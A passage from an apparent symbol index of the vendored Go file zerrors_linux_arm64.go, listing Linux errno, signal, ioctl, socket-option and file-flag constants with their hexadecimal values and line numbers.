syscall.Errno(0x74) constant ESTRPIPE (line 637) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 638) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 639) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 640) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 641) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 642) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 643) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 644) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 649) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 650) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 651) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 652) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 653) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 654) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 655) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 656) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 657) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 658) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 659) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 660) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 661) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 662) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 663) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 664) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 665) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 666) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 667) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 668) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 669) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_arm64.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant ESR_MAGIC (line 82) | ESR_MAGIC = 0x45535201 constant EXTPROC (line 83) | EXTPROC = 0x10000 constant EXTRA_MAGIC (line 84) | EXTRA_MAGIC = 0x45585401 constant FF1 (line 85) | FF1 = 0x8000 constant FFDLY (line 86) | FFDLY = 0x8000 constant FICLONE (line 87) | FICLONE = 0x40049409 constant FICLONERANGE (line 88) | FICLONERANGE = 0x4020940d constant FLUSHO (line 89) | FLUSHO = 0x1000 constant FPSIMD_MAGIC (line 90) | FPSIMD_MAGIC = 0x46508001 constant FS_IOC_ENABLE_VERITY (line 91) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 92) | FS_IOC_GETFLAGS = 0x80086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 93) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 94) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 95) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 96) | FS_IOC_SETFLAGS = 0x40086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 97) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 98) | F_GETLK = 0x5 constant F_GETLK64 (line 99) | F_GETLK64 = 0x5 constant F_GETOWN (line 100) | F_GETOWN = 0x9 constant F_RDLCK (line 101) | F_RDLCK = 0x0 constant F_SETLK (line 102) | F_SETLK = 0x6 constant F_SETLK64 (line 103) | F_SETLK64 = 0x6 constant F_SETLKW (line 104) | F_SETLKW = 0x7 constant F_SETLKW64 (line 105) | F_SETLKW64 = 0x7 constant F_SETOWN (line 106) | F_SETOWN = 0x8 constant F_UNLCK (line 107) | F_UNLCK = 0x2 constant F_WRLCK (line 108) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 109) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 110) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 111) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 112) | HUPCL = 0x400 constant ICANON (line 113) | ICANON = 0x2 constant IEXTEN (line 114) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 115) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 116) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 117) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 118) | ISIG = 0x1 constant IUCLC (line 119) | IUCLC = 0x200 constant IXOFF (line 120) | IXOFF = 0x1000 constant IXON (line 121) | IXON = 0x400 constant MAP_ANON (line 122) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 123) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 124) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 125) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 126) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 127) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 128) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 129) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 130) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 131) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 132) | MAP_STACK = 0x20000 constant MAP_SYNC (line 133) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 134) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 135) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 136) | MCL_ONFAULT = 0x4 constant MEMERASE (line 137) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 138) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 139) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 140) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 141) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 142) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 143) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 144) | MEMLOCK = 0x40084d05 constant MEMREAD (line 145) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 146) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 147) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 148) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 149) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 150) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 151) | NFDBITS = 0x40 constant NLDLY (line 152) | NLDLY = 0x100 constant NOFLSH (line 153) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 154) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 155) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 156) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 157) | NS_GET_USERNS = 0xb701 constant OLCUC (line 158) | OLCUC = 0x2 constant ONLCR (line 159) | ONLCR = 0x4 constant OTPERASE (line 160) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 161) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 162) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 163) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 164) | OTPSELECT = 0x80044d0d constant O_APPEND (line 165) | O_APPEND = 0x400 constant O_ASYNC (line 166) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 167) | O_CLOEXEC = 0x80000 constant O_CREAT (line 168) | O_CREAT = 0x40 constant O_DIRECT (line 169) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 170) | O_DIRECTORY = 0x4000 constant O_DSYNC (line 171) | O_DSYNC = 0x1000 constant O_EXCL (line 172) | O_EXCL = 0x80 constant O_FSYNC (line 173) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 174) | O_LARGEFILE = 0x0 constant O_NDELAY (line 175) | O_NDELAY = 0x800 constant O_NOATIME (line 176) | O_NOATIME = 0x40000 constant O_NOCTTY (line 177) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 178) | O_NOFOLLOW = 0x8000 constant O_NONBLOCK (line 179) | O_NONBLOCK = 0x800 constant O_PATH (line 180) | O_PATH = 0x200000 constant O_RSYNC (line 181) | O_RSYNC = 0x101000 constant O_SYNC (line 182) | O_SYNC = 0x101000 constant O_TMPFILE (line 183) | O_TMPFILE = 0x404000 constant O_TRUNC (line 184) | O_TRUNC = 0x200 constant PARENB (line 185) | PARENB = 0x100 constant PARODD (line 186) | PARODD = 0x200 constant PENDIN (line 187) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 188) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 189) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 190) | PERF_EVENT_IOC_ID = 0x80082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 191) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 192) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 193) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 194) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 195) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 196) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 197) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 198) | PERF_EVENT_IOC_SET_FILTER = 0x40082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 199) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 200) | PPPIOCATTACH = 0x4004743d constant PPPIOCATTCHAN (line 201) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 202) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 203) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 204) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 205) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 206) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 207) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 208) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 209) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 210) | PPPIOCGIDLE = 0x8010743f constant PPPIOCGIDLE32 (line 211) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 212) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 213) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 214) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 215) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 216) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 217) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 218) | PPPIOCSACTIVE = 0x40107446 constant PPPIOCSASYNCMAP (line 219) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 220) | PPPIOCSCOMPRESS = 0x4010744d constant PPPIOCSDEBUG (line 221) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 222) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 223) | PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 224) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 225) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 226) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 227) | PPPIOCSPASS = 0x40107447 constant PPPIOCSRASYNCMAP (line 228) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 229) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 230) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 231) | PPPIOCXFERUNIT = 0x744e constant PROT_BTI (line 232) | PROT_BTI = 0x10 constant PROT_MTE (line 233) | PROT_MTE = 0x20 constant PR_SET_PTRACER_ANY (line 234) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_PEEKMTETAGS (line 235) | PTRACE_PEEKMTETAGS = 0x21 constant PTRACE_POKEMTETAGS (line 236) | PTRACE_POKEMTETAGS = 0x22 constant PTRACE_SYSEMU (line 237) | PTRACE_SYSEMU = 0x1f constant PTRACE_SYSEMU_SINGLESTEP (line 238) | PTRACE_SYSEMU_SINGLESTEP = 0x20 constant RLIMIT_AS (line 239) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 240) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 241) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 242) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 243) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 244) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 245) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 246) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 247) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 248) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 249) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 250) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 251) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 252) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 253) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 254) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 255) | RTC_EPOCH_READ = 0x8008700d constant RTC_EPOCH_SET (line 256) | RTC_EPOCH_SET = 0x4008700e constant RTC_IRQP_READ (line 257) | RTC_IRQP_READ = 0x8008700b constant RTC_IRQP_SET (line 258) | RTC_IRQP_SET = 0x4008700c constant RTC_PARAM_GET (line 259) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 260) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 261) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 262) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 263) | RTC_PLL_GET = 0x80207011 constant RTC_PLL_SET (line 264) | RTC_PLL_SET = 0x40207012 constant RTC_RD_TIME (line 265) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 266) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 267) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 268) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 269) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 270) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 271) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 272) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 273) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 274) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 275) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 276) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 277) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 278) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 279) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 280) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 281) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 282) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 283) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 284) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 285) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 286) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 287) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 288) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 289) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 290) | SIOCINQ = 0x541b constant SIOCOUTQ (line 291) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 292) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 293) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 294) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 295) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 296) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 297) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 298) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 299) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 300) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 301) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 302) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 303) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 304) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 305) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 306) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 307) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 308) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 309) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 310) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 311) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 312) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 313) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 314) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 315) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 316) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 317) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 318) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 319) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 320) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 321) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 322) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 323) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 324) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 325) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 326) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 327) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 328) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 329) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 330) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 331) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 332) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 333) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 334) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 335) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 336) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 337) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 338) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 339) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 340) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 341) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 342) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 343) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 344) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 345) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 346) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 347) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 348) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 349) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 350) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 351) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 352) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 353) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 354) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 355) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 356) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 357) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 358) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 359) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 360) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 361) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 362) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 363) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 364) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 365) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 366) | SO_TXTIME = 0x3d constant SO_TYPE (line 367) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 368) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 369) | SO_ZEROCOPY = 0x3c constant SVE_MAGIC (line 370) | SVE_MAGIC = 0x53564501 constant TAB1 (line 371) | TAB1 = 0x800 constant TAB2 (line 372) | TAB2 = 0x1000 constant TAB3 (line 373) | TAB3 = 0x1800 constant TABDLY (line 374) | TABDLY = 0x1800 constant TCFLSH (line 375) | TCFLSH = 0x540b constant TCGETA (line 376) | TCGETA = 0x5405 constant TCGETS (line 377) | TCGETS = 0x5401 constant TCGETS2 (line 378) | TCGETS2 = 0x802c542a constant TCGETX (line 379) | TCGETX = 0x5432 constant TCSAFLUSH (line 380) | TCSAFLUSH = 0x2 constant TCSBRK (line 381) | TCSBRK = 0x5409 constant TCSBRKP (line 382) | TCSBRKP = 0x5425 constant TCSETA (line 383) | TCSETA = 0x5406 constant TCSETAF (line 384) | TCSETAF = 0x5408 constant TCSETAW (line 385) | TCSETAW = 0x5407 constant TCSETS (line 386) | TCSETS = 0x5402 constant TCSETS2 (line 387) | TCSETS2 = 0x402c542b constant TCSETSF (line 388) | TCSETSF = 0x5404 constant TCSETSF2 (line 389) | TCSETSF2 = 0x402c542d constant TCSETSW (line 390) | TCSETSW = 0x5403 constant TCSETSW2 (line 391) | TCSETSW2 = 0x402c542c constant TCSETX (line 392) | TCSETX = 0x5433 constant TCSETXF (line 393) | TCSETXF = 0x5434 constant TCSETXW (line 394) | TCSETXW = 0x5435 constant TCXONC (line 395) | TCXONC = 0x540a constant TFD_CLOEXEC (line 396) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 397) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 398) | TIOCCBRK = 0x5428 constant TIOCCONS (line 399) | TIOCCONS = 0x541d constant TIOCEXCL (line 400) | TIOCEXCL = 0x540c constant TIOCGDEV (line 401) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 402) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 403) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 404) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 405) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 406) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 407) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 408) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 409) | TIOCGPTLCK = 0x80045439 constant 